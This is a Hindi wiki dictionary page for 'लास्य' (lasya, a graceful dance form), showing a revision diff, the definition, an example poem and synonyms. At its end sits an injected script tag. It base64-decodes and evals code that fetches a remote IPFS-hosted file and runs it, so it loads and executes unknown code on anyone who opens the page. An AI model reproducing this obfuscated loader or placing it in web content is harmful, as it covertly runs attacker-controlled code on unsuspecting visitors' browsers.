Difference between revisions of "लास्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - " शृंगार " to " श्रृंगार ")
m (Text replacement - "करनेवाला" to "करने वाला")
 
Line 4: Line 4:
 
|उदाहरण=<poem>मादक सुगंध से भरी, पंथ-पंथ आम्र मंजरी, कोयलिया कूक कूक कर, इठलाती फिरे बावरी।
 
|उदाहरण=<poem>मादक सुगंध से भरी, पंथ-पंथ आम्र मंजरी, कोयलिया कूक कूक कर, इठलाती फिरे बावरी।
 
जाती है जहाँ [[दृष्टि]], मनहारी सकल सृष्टि, '''लास्य''' दिगदिगंत छा गया देखो वसंत आ गया।।</poem>
 
जाती है जहाँ [[दृष्टि]], मनहारी सकल सृष्टि, '''लास्य''' दिगदिगंत छा गया देखो वसंत आ गया।।</poem>
|विशेष='''लास्य''' वह नृत्य कहलाता है, जिसमें कोमल अंग-भंगियों के द्वारा मधुर भावों का प्रदर्शन होता है, और जो श्रृंगार आदि कोमल रसों को उद्दीप्त करनेवाला होता है। इसमें गायन तथा वादन दोनों का योग रहता है।
+
|विशेष='''लास्य''' वह नृत्य कहलाता है, जिसमें कोमल अंग-भंगियों के द्वारा मधुर भावों का प्रदर्शन होता है, और जो श्रृंगार आदि कोमल रसों को उद्दीप्त करने वाला होता है। इसमें गायन तथा वादन दोनों का योग रहता है।
 
|विलोम=
 
|विलोम=
 
|पर्यायवाची=नचन, रास, गीत, [[संगीत]]
 
|पर्यायवाची=नचन, रास, गीत, [[संगीत]]

Latest revision as of 13:52, 6 September 2017

shabd sandarbh
hindi nrity, nach, gayan-vadan ke sath nrity, stri-nrity jisamean prem-bhav pradarshit kiya jata hai, ek prakar ka tantrika-vikar jisamean pray: sare sharir mean jhataka sa lagane ki anaichchhik gatiyaan hoti haian.
-vyakaran    pulliang
-udaharan  

madak sugandh se bhari, panth-panth amr manjari, koyaliya kook kook kar, ithalati phire bavari.
jati hai jahaan drishti, manahari sakal srishti, lasy digadigant chha gaya dekho vasant a gaya..

-vishesh    lasy vah nrity kahalata hai, jisamean komal aang-bhangiyoan ke dvara madhur bhavoan ka pradarshan hota hai, aur jo shrriangar adi komal rasoan ko uddipt karane vala hota hai. isamean gayan tatha vadan donoan ka yog rahata hai.
-vilom   
-paryayavachi    nachan, ras, git, sangit
sanskrit lash+nyath
any granth
sanbandhit shabd
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>